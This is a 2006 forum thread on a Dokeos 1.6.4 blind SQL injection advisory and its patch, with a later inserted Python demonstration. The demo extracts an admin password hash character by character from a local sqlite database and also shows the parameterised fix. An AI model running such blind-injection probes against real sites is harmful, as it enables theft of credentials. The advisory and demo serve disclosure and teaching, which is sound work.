[Fixed 1.6.4 patch] Dokeos 1.6.4 SQL Injection Vulnerability

Dokeos 1.6.x is no longer the latest version. Please use Dokeos 1.8


Postby QuEsT » Tue Apr 11, 2006 3:24 am

Dokeos 1.6.4 SQL Injection Vulnerability


Author: Alvaro Olavarria - aolavarria at secure.cl

Affected: Dokeos <= 1.6.4
Status: Notified hereby
Vendor url: http://www.dokeos.com


Vulnerability.

Dokeos was built using Claroline's code; it inherited several of its features, including an old version of phpBB which is being used as the forum for the courses. There is a problem in "viewtopic.php", where the $topic variable is not correctly sanitized when $forumview is equal to "threaded", which would allow an attacker to inject arbitrary code into the application.


Impact

An attacker could use Blind SQL Injection to gain access to privileged data like the password hashes for the administrator user and so on.


Proof of Concept

http://localhost/claroline/phpbb/viewto ... ed&topic=1[blind_sql_inject]


Greetings

Rodrigo Guitierrez -  rodrigo at secure.cl
University of Los Lagos in Chile "for lending the required equipment for testing" >:D

http://lists.grok.org.uk/pipermail/full ... 44995.html

<strong>note by admin: Use the file attached to close the sql injection hole</strong>
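The advisory above says what is wrong (an unsanitized $topic in viewtopic.php) and what it leads to (blind extraction of password hashes), but not how the two connect. The following is an added example, not code from Dokeos, Claroline or phpBB: it is a hypothetical reconstruction of the vulnerable pattern in Python, with sqlite3 standing in for MySQL and constructed table and column names (users, topics, user_password) that do not claim to match the real phpBB schema. It shows a boolean-based blind injection recovering the admin hash one character at a time through nothing more than "topic shown / topic not shown", and the same probe failing against a version that casts and binds the parameter, which is the kind of one-line fix the thread later asks about.

```python
import sqlite3

# Constructed sample data standing in for a course forum database.
# Added illustration only; sqlite3 replaces MySQL and the schema is invented.
# The stored hash is md5("password"), used here purely as sample data.
SCHEMA = """
CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, user_password TEXT);
CREATE TABLE topics (topic_id INTEGER PRIMARY KEY, topic_title TEXT);
INSERT INTO users VALUES (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO topics VALUES (1, 'Welcome to the course');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_topic_vulnerable(conn, topic):
    # Hypothetical reconstruction of the pattern the advisory describes:
    # the request parameter is pasted straight into the SQL text.
    # Returns the title, or None when the WHERE clause matches nothing.
    # The attacker sees only "shown" vs "not shown": a blind oracle.
    sql = "SELECT topic_title FROM topics WHERE topic_id = " + str(topic)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def view_topic_fixed(conn, topic):
    # Hardened form: reject anything that is not an integer, then bind the
    # value as a parameter so it can never become SQL syntax. (PHP's intval()
    # would instead truncate "1 AND ..." to 1; either way the injection dies.)
    try:
        topic_id = int(topic)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT topic_title FROM topics WHERE topic_id = ?", (topic_id,)
    ).fetchone()
    return row[0] if row else None


HEX = "0123456789abcdef"


def leak_password_hash(view, conn, topic_id=1, length=32):
    # Boolean-based blind extraction: each probe ANDs a guess about one
    # character of the admin hash onto a valid topic id. The page shows the
    # topic only when the guess is right, so the response is the oracle.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            payload = (
                f"{topic_id} AND (SELECT substr(user_password,{pos},1) "
                f"FROM users WHERE username='admin') = '{ch}'"
            )
            if view(conn, payload) is not None:
                recovered += ch
                break
        else:
            # No character matched: the parameter is not injectable
            # (or the hash is shorter than expected). Stop here.
            return recovered
    return recovered


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", leak_password_hash(view_topic_vulnerable, db))
    print("fixed:     ", repr(leak_password_hash(view_topic_fixed, db)))
```

Run as a script it prints the full 32-character hash for the vulnerable handler and an empty string for the fixed one. The probe loop is the whole point of the "blind" in the advisory: no error message and no data ever leaves the page; the attacker needs only a yes/no difference per request, at most 16 requests per hash character.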

Postby Hugues » Tue Apr 11, 2006 10:49 am

Dokeos was built using Claroline's code; it inherited several of its features including an old version of phpBB which is being used as the forum for the courses.
Claroline <strong>1.7</strong> is NOT concerned by this security hole. And the problem has already been fixed in Claroline <strong>1.6</strong> (see the last 1.6.* version available in the <a href="http://www.claroline.net/download.htm">download section of the Claroline web site</a>).

Concerning Dokeos, you'll find attached to this message the patch fixing the security hole discovered by Rodrigo Guitierrez.

Hugues Peeters
<small><strong>Claroline</strong> - Open Source e-learning - <a href="http://www.claroline.net">http://www.claroline.net</a></small>

Postby pcool » Tue Apr 11, 2006 10:54 am

Indeed, and I'm afraid there are a lot of holes for SQL injection in the version of phpBB that is used by Dokeos.
For dokeos 1.8 there is a completely new forum that has (hopefully) less holes

Postby pcool » Tue Apr 11, 2006 10:56 am

Thanks Hugues !!!

Postby QuEsT » Tue Apr 11, 2006 11:24 pm

Hugues wrote: Concerning Dokeos, you'll find attached to this message the patch fixing the security hole discovered by Rodrigo Guitierrez.

...sorry, but that was discovered by Alvaro Olavarria...

pcool wrote: I'm afraid there are a lot of holes for sql injection in the version of phpbb that is used by dokeos.

...it's true and very possible...

pcool wrote: For dokeos 1.8 there is a completely new forum that has (hopefully) less holes

... really, that is the best solution... it does not make sense to continue working on that old and disordered code.

Good Luck with Dokeos 1.8!

<em>Note: Very fast patched.. congratulations.</em>

Postby digibyte » Wed Apr 12, 2006 3:29 pm

Where could I download the patch?
Or what CVS command should I use to get this?

Postby pcool » Wed Apr 12, 2006 3:40 pm

The patch for Dokeos 1.6.4 will be released this evening.

Postby roan » Wed Apr 12, 2006 3:43 pm

Using cvs commands: normally this is possible, but anonymous cvs is currently not updated on SourceForge - they had a big server problem a week ago and are still recovering. Developer cvs access works again, but anonymous access will come later.

There is a new <em>Dokeos community release 2.0.4</em> that contains a patch:
<a href="http://prdownloads.sourceforge.net/dokeos/dokeos-community-204.tar.gz?download">Dokeos community release 2.0.4 (tar.gz)</a>
<a href="http://prdownloads.sourceforge.net/dokeos/dokeos-community-204.zip?download">Dokeos community release 2.0.4 (zip)</a>
<a href="http://www.dokeos.com/wiki/index.php/Dokeos_community_2.0.4_release_notes">Release notes</a>

A new version or patch for Dokeos 1.6.x will probably be released tonight

Postby pcool » Wed Apr 12, 2006 3:47 pm

Here is the file that will be in the patch

Just overwrite the file on your campus with this one if you have not made any changes in this file.
This will close the sql injection hole.

Postby digibyte » Wed Apr 12, 2006 4:14 pm

Thanks for the quick reply.

Postby domifreitas » Wed Apr 12, 2006 5:38 pm

Something seems to be wrong with the file provided. After upgrading, when trying to view a topic, I get that file 'viewtopic.php' edited, not the topic...

Postby Thomas » Wed Apr 12, 2006 5:42 pm

You should rename it to viewtopic.php instead of .phps.

Postby domifreitas » Wed Apr 12, 2006 5:43 pm

I did.
Someone else has the same problem?

EDIT: it was a problem with Firefox and its download. I got the file in another way. Thanks.

Postby misterlu » Wed Apr 19, 2006 9:48 am

Is it possible to post in this topic where the SQL injection is and the correction (only the line needed to remove it), please?

Thanks in advance :-)
